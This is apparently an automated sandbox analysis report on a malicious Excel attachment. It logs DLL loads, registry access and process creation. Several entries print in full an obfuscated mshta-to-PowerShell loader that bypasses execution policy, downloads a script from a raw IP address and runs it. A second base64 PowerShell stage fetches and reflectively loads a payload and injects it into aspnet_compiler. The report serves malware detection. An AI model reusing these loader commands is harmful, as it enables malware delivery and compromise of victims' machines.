Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: .pdb| source: powershell.exe, 00000008.00000002.512809894.000000001C109000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdb source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdbhP source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
Source: PI-02911202409#.xla.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation
barindex
PowerShell case anomaly found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Suspicious command line found
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvc